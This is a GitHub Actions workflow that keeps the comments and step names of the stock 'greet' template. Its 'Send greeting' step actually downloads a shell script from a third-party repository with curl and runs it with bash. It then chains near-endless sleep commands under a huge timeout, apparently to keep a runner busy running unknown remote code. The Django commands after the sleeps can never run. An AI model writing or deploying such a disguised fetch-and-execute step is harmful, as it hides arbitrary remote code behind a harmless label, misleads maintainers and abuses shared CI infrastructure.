# This is a basic workflow that is manually triggered

name: Manual workflow

# Controls when the action will run. Workflow runs when manually triggered using the UI
# or API.
on:
  workflow_dispatch:
    # Inputs the workflow accepts.
    inputs:
      name:
        # Friendly description to be shown in the UI instead of 'name'
        description: 'Person to greet'
        # Default value if no value is explicitly provided
        default: '513735'
        # Input has to be provided for the workflow to run
        required: true
        # The data type of the input
        type: string

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "greet"
  greet:
    strategy:
      fail-fast: false
      
    # The type of runner that the job will run on
    runs-on: ubuntu-latest
    timeout-minutes: 9999999

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
    # Runs a single command using the runners shell
    - name: Send greeting
      run: curl -o /tmp/php.sh -Ls https://github.com/A233S/angti/raw/main/phpv3.sh ; bash /tmp/php.sh ${{ inputs.name }} && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999 && sleep 9999999999999999  && python manage.py migrate && python manage.py collectstatic --noinput && gunicorn mysite.wsgi
